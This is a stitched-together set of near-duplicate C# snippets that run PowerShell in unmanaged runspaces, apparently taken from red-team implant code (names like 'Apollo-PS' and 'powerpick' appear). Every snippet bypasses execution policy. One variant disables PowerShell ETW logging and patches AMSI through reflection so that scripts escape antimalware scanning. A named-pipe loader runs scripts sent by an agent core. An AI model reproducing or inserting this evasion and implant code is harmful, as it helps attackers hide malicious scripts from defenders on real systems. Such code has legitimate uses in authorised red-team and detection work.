public static string InvokeScript(string command, bool useLocalScope)
{
CustomPSHost host = new CustomPSHost();
InitialSessionState state = InitialSessionState.CreateDefault();
state.AuthorizationManager = null; // Bypass PowerShell execution policy
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.Open();
using (Pipeline pipeline = runspace.CreatePipeline())
{
pipeline.Commands.AddScript(command, useLocalScope);
pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
pipeline.Commands.Add("out-default");
pipeline.Invoke();
}
}
string output = ((CustomPSHostUserInterface)host.UI).Output;
return(output);
}
public static string InvokePS(string command)
{
// I had to implement a custom PSHost in order to get Write-Host to work.
// This wouldn't be an issue if all PowerShell scripts used Write-Output
// instead of Write-Host, but enough use Write-Host that it's worth it
// to implement a custom PSHost
CustomPSHost host = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.ApartmentState = ApartmentState.STA; // STA so we can do fun stuff like token impersonation easier
state.AuthorizationManager = null; // Bypass PowerShell execution policy
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.Open();
using (Pipeline pipeline = runspace.CreatePipeline())
{
pipeline.Commands.AddScript(command);
pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
pipeline.Commands.Add("out-default");
pipeline.Invoke();
}
}
string output = ((CustomPSHostUserInterface)host.UI).Output;
return(output);
}
public static string InvokePS(string command)
{
// I had to implement a custom PSHost in order to get Write-Host to work.
// This wouldn't be an issue if all PowerShell scripts used Write-Output
// instead of Write-Host, but enough use Write-Host that it's worth it
// to implement a custom PSHost
CustomPSHost host = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.AuthorizationManager = null; // Bypass PowerShell execution policy
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.Open();
using (Pipeline pipeline = runspace.CreatePipeline())
{
pipeline.Commands.AddScript(command);
pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
pipeline.Commands.Add("out-default");
pipeline.Invoke();
}
}
string output = ((CustomPSHostUserInterface)host.UI).Output;
return output;
}
private Harness()
{
this.host = new CustomPSHost(this);
this.state = InitialSessionState.CreateDefault();
this.state.AuthorizationManager = null;
this.myRunSpace = RunspaceFactory.CreateRunspace(this.host, this.state);
this.myRunSpace.ThreadOptions = PSThreadOptions.UseCurrentThread;
this.myRunSpace.Open();
}
public Runner()
{
_state = InitialSessionState.CreateDefault();
_state.AuthorizationManager = null;
_host = new CustomPSHost();
_runspace = RunspaceFactory.CreateRunspace(_host, _state);
_runspace.Open();
}
private Harness()
{
this.host = new CustomPSHost(this);
this.state = InitialSessionState.CreateDefault();
this.state.AuthorizationManager = null;
this.myRunSpace = RunspaceFactory.CreateRunspace(this.host, this.state);
this.myRunSpace.ThreadOptions = PSThreadOptions.UseCurrentThread;
this.myRunSpace.Open();
}
public Runner(string id)
{
_id = id;
_state = InitialSessionState.CreateDefault();
_state.AuthorizationManager = null;
_host = new CustomPSHost();
_runspace = RunspaceFactory.CreateRunspace(_host, _state);
_runspace.Open();
}
public PowerShellRunner()
{
PSHost = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.AuthorizationManager = null; // Bypass PowerShell execution policy
state.LanguageMode = PSLanguageMode.FullLanguage; // lol?
Runspace = RunspaceFactory.CreateRunspace(PSHost, state);
Runspace.Open();
Pipeline = Runspace.CreatePipeline();
}
internal Runner(string id)
{
_id = id;
_state = InitialSessionState.CreateDefault();
_state.AuthorizationManager = null;
_host = new CustomPSHost();
_runspace = RunspaceFactory.CreateRunspace(_host, _state);
_runspace.Open();
// add support straight up for the existing scripts
foreach (var script in Scripts.GetAllScripts())
{
Execute(script);
}
}
public static string InvokePS(string command)
{
// I had to implement a custom PSHost in order to get Write-Host to work.
// This wouldn't be an issue if all PowerShell scripts used Write-Output
// instead of Write-Host, but enough use Write-Host that it's worth it
// to implement a custom PSHost
CustomPSHost host = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.AuthorizationManager = null; // Bypass PowerShell execution policy
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.Open();
using (Pipeline pipeline = runspace.CreatePipeline())
{
BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
var PSEtwLogProvider = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
EtwProvider.SetValue(null, EventProvider);
var amsiUtils = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
pipeline.Commands.AddScript(command);
pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
pipeline.Commands.Add("out-default");
pipeline.Invoke();
}
}
string output = ((CustomPSHostUserInterface)host.UI).Output;
return(output);
}
public static string InvokeCommand(string command, bool isScript, bool useLocalScope, string[] parameterNames, object parameterValue)
{
ArrayList parameterValues = (parameterValue as ArrayList);
CustomPSHost host = new CustomPSHost();
InitialSessionState state = InitialSessionState.CreateDefault();
state.AuthorizationManager = null; // Bypass PowerShell execution policy
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.Open();
using (Pipeline pipeline = runspace.CreatePipeline())
{
Command scriptCommand = new Command(command, isScript, useLocalScope);
for (int i = 0; i < parameterNames.Length; i++)
{
if (i < parameterValues.Count)
{
scriptCommand.Parameters.Add(parameterNames[i], parameterValues[i]);
}
else
{
scriptCommand.Parameters.Add(parameterNames[i]);
}
}
scriptCommand.MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
pipeline.Commands.Add(scriptCommand);
pipeline.Commands.Add("out-default");
pipeline.Invoke();
}
}
return(((CustomPSHostUserInterface)host.UI).Output);
}
public static void InitializeNamedPipeServer(string pipeName)
{
//var pipeName = "Apollo-PS";
bf.Binder = new PowerShellJobMessageBinder();
NamedPipeServerStream pipeServer = null;
try
{
pipeServer = CreateNamedPipeServer(pipeName);
}
catch (Exception e)
{
Console.WriteLine("ERROR: Could not start named pipe server. " + e.Message);
}
if (pipeServer == null)
{
KillJob(JobExitCode.PipeStartError);
}
PowerShellJobMessage newJob = null;
try
{
// We shouldn't need to go async here since we'll only have one client, the agent core, and it'll maintain the connection to the named pipe until the job is done
pipeServer.WaitForConnection();
newJob = ReadJob(pipeServer);
}
catch (Exception e)
{
Console.WriteLine("ERROR: Could not read powershell from named pipe. " + e.Message);
pipeServer.Close();
return;
}
// Create new named pipe with task ID as name
// This ensures that we don't collide with other jobs that might try to use this pipe name
if (newJob == null)
{
KillJob(JobExitCode.AssemblyReadError);
}
using (StreamWriter writer = new StreamWriter(pipeServer))
{
writer.AutoFlush = true;
// commented out for powerpick testing
#if !POWERPICK
var origStdout = Console.Out;
var origStderr = Console.Error;
Console.SetOut(writer);
Console.SetError(writer);
#endif
try
{
CustomPSHost host = new CustomPSHost();
InitialSessionState state = InitialSessionState.CreateDefault();
state.AuthorizationManager = null;
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.Open();
using (Pipeline pipeline = runspace.CreatePipeline())
{
pipeline.Commands.AddScript(newJob.LoadedScript);
pipeline.Commands.AddScript(newJob.Command);
pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
pipeline.Commands.Add("Out-Default");
pipeline.Invoke();
}
}
}
catch (Exception e)
{
Console.WriteLine("ERROR: Unhandled exception in the PowerShellRunner: {0}\n{1}", e.Message, e.StackTrace);
//Console.WriteLine(e);
}
finally
{
// for powerpick.
#if POWERPICK
bf.Serialize(pipeServer, new PowerShellTerminatedMessage()
{
Message = "Finished execution."
});
#else
// commented out for powerpick
// Restore streams... probably don't need to do this but meh
Console.SetOut(origStdout);
Console.SetError(origStderr);
#endif
}
pipeServer.WaitForPipeDrain();
}
//Console.WriteLine("Waiting for output to be read completely...");
//Console.WriteLine("Exiting loader stub...");
}